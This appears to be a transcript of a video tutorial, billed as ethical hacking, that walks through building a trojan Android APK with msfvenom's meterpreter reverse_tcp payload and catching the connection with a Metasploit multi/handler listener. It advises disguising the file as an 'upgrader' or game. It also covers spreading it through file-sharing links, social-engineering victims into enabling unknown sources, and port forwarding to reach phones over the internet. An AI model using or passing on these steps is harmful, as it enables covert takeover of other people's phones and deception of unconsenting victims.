Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorial, I taught you about the different applications we could use to go ahead and sniff, hack and DOS a specific router or any other machine through a cell phone, and how we could also go ahead and use Kali Linux on our own cell phone. But that's not it. Even though the Android is based on Linux, it is still insecure. And when I say insecure, it means any person can go ahead and let's say make you, or let's say for example, I'm not getting the exact term over here. Okay, he can actually go ahead and fool you into downloading something and running it as an application. But when you actually go ahead and run that, you could see that it is not the exact application, and finally your system will be hacked. So I'll just go ahead and start it over here, and I'll be going ahead and hacking. I'll be teaching us how we can go ahead and hack into the specific Android system, may it be Lollipop or Jelly Bean, or it doesn't matter which one you're using. It works on almost everyone as far as I have checked on Google Galaxy Nexus 5, Nexus 4, Nexus 6 as well. I have also used it on the Note 3, Note 4, Xperia Z, Z2 and different versions of the Micromax cell phones as well. So let's go ahead and I'll teach you as to how you can do that. I don't have any cell phone at this point of time, but I'll be showing you exactly how it works so that it will be easier for you to understand. And for this specific thing to run, the unknown sources must be ticked. I'll just show you how it looks like. The unknown sources must be ticked on the computer's on the person's cell phone, so that our application run, else it will not run. As you can see, when you go into settings, unknown sources should be ticked. Most probably nowadays people already have these sources ticked, but if not, then if you need to go ahead and social engineer your way to go ahead and make your target tick this specific thing in order for you to go ahead and install that app. Perfect. So this is a tutorial explaining how to go ahead and hack Android phones with Kali Linux, and the first thing that we would need to do would be to go ahead and fire up our Kali Linux. So once we have this, I need to go ahead and make a Trojan period APK file, and you can go ahead and do this by typing msf payload or msf venom space Android. Let me check if the payload is still working. Okay, payload is still working, but I believe that has been deprecated. Let me check. Yes, payload is deprecated, so we will be using msf venom instead, and type android / meterpreter / reverse underscore tcp lhost equals to, write down your own IP address, and for me it would be, just type ifconfig, and I'll just copy this and paste it over here, and I'll type /root /upgrader period APK, and I'll just replace the host with your own IP address. You can also hack Android on WAN, that is wireless area network, that is through internet, by using public or external IP in your lhost or your local host, and by port forwarding. And you can go ahead and see port forwarding in one of my previous tutorials. I won't be teaching you that. And just hit enter. Let's wait till this gets completed. So I believe upgrader.apk should be created in my home directory. Yes, perfect. So I have this upgrader period APK. So this specific file, I need to go ahead and send this to my target's machine, and just open another terminal, and we need to go ahead and start our MSF console, so that as soon as the person goes ahead and install this, we will get a meterpreter session opened over here, that we could go ahead and use our root or directory to go ahead and do anything that we want in the person's Android cell phone. So just type MSF console over here, and it will start the MSF console. Let's wait till that happens. Okay, so we have our MSF console up and running, and now what we need to do is that we need to go ahead and set up a listener. So, and we need to go ahead and load the multi-handler exploit, so that as soon as the person starts, our listener will already be on, and we will already go ahead and get a reverse TCP connection over here. And as you see, if you see it properly over here, what I did was that I created a reverse TCP connection over here. So by doing that, whatever the person, okay, sorry, I think this upgrader has a problem. I'll just delete that and I'll create a new one because there was a spelling mistake. It should be reverse score TCP. Perfect. Okay, as you can see, my new file has been created. I believe it's under construction. Yep, 0 bytes. Perfect. So I have this upgrader period APK that I need to send this to my target, and before I send it, I need to go ahead and set up the listener so that as soon as the person installs, I will have the listener ready and ready to fire up. And so I could go ahead and do that by typing use exploit / multi / handler, and I'll hit enter. And our multi-handler will be started. So now we need to go ahead and set up a payload by typing set payload Android, because this multi-handler will be can be for anything, Linux, Windows, or any other operating system. So we need to set this specifically for Android. So we need to type set payload Android / meterpreter / reverse underscore TCP, and I'll just go ahead and hit enter, and it has been set. The payload is set to meterpreter Android reverse TCP. Now we need to go ahead and set our local host. So I'll just type lhost and go ahead and type your IP address, and I'll just go ahead and, okay, I mistakenly opened the iceweasel. Let me just close it first, and I'll type ifconfig, copy it and paste it over here. So this will be my local host where the connection would be coming in back. And if you are going ahead and hacking this specific Android on a wireless network that is on, let's say for example, like as of now, I am going ahead and using this on a VMware. And if I'm going to go ahead and hack on a wireless network, not on a LAN, and when I say LAN, I mean by a wireless Wi-Fi network. If your Android is not on a Wi-Fi network, then you need to go ahead and use your actual IP address that would be over here. Okay, Windows system 32, and I'll just go ahead and run. Perfect. So this would be the IP address that I would be needing to set over here, and as of now I will be assuming that we are on a local area network, so I am using the internal IP address. If you're not on local area network, and if you're on you hacking someone through internet, then you need to go ahead and use the IPv4 and then port forward your this specific thing to over here. And in order to port forward, you can go ahead and see whether it's selected and type. Okay, you can type this and see whether your port is forwarded. If not, then you can go ahead and specifically port forward by go ahead and editing it by typing nano. It will open this specific port forward file in Nano Editor, and just change this 0 to 1. Type Control X. It will ask you whether you want to save. Type Y and enter, Perfect. And again go ahead and see whether, yes, perfect, it's 1. That means its port forwarding is on. So I'll just minimize this for the time being, and this would be my IP address. I have forwarded this port, so I'll just go ahead and hit enter. So I have set up the lhost, and at the last type, now we need to go ahead and exploit to start the listener. So just go ahead and copy this application file to your root directory of your Android phone, and when I say root, I mean your internal SD card, or go ahead and send it to any specific person using a Dropbox, or uploading to any sharing website like SpeedyShare by renaming it to any game APK file or something, and send this link to that website. We'll go ahead and download it to your friend's phone or exploit their phones through this. And it should be only on LAN, but if you're using a WAN method, then you can use the exploit anywhere on internet. And you need to include something. If you are sending it through email, you need to something in the email telling them how to actually enable these unknown sources. Most phones nowadays already have these enabled by default. And let the victim install this upgrader period APK, as he would think it is meant to upgrade his file, some new features on his phone. However, the option of allowance for installation of apps from unknown sources should be enabled. If not, and as soon as he goes ahead and runs this specific file, I can go ahead and type sessions-l And as of now, there are no active sessions because I have not yet started this on my specific cell phone. But if I had installed this, then I can go ahead and straight away install this specific thing on my cell phone, and my Meterpreter session will be open. And while you have to start the listener with the private IP address because it tells the listener that which PC is in network, we will be using our internal IP address as of now. If you are using trying it for WAN, then you need to go ahead and use the external IP address, and make sure that the port that you would be using would be 4444 or 8080. That would be in Kali's internal IP, Kali's. And the service type will be TCP or UDP. If you're using VMware, then you need to make sure that you switch off your antivirus firewall so that it will allow the connections to the VMware virus. That's it. And another solution that be if you have the default DMZ option, enable it in the Kali Linux. This will forward all the ports. Also, this won't open the ports, but it will only forward, and it will only forward them. So if you are testing something for port open services, they will tell you where the ports are closed, so you don't need to worry that someone can go ahead and gain access to your computer. So that's it for this tutorial, and I have already taught you how we can go ahead and access into any of our target's computer as well as their phone. So that's it for the basic Android and hacking stuff with Kali Linux. And in the next tutorial, which I would be starting from next time onwards, that would be the advanced Kali Linux. I would be teaching you everything in detail as to how we can go ahead and use these Hydra, Burp Suite, John to go ahead and crack different network things, SQL mapping, and that would be lots of other stuff, and it would be much more in detail. But you need to know all of these things in detail, in specific, so that you exactly know what we are doing, because if you go ahead and straight away jump to my next tutorial, you won't be able to understand a bit, and you need to go ahead and have these basic things done already. So that's it guys for this tutorial. Have a nice day ahead. See you later. Bye.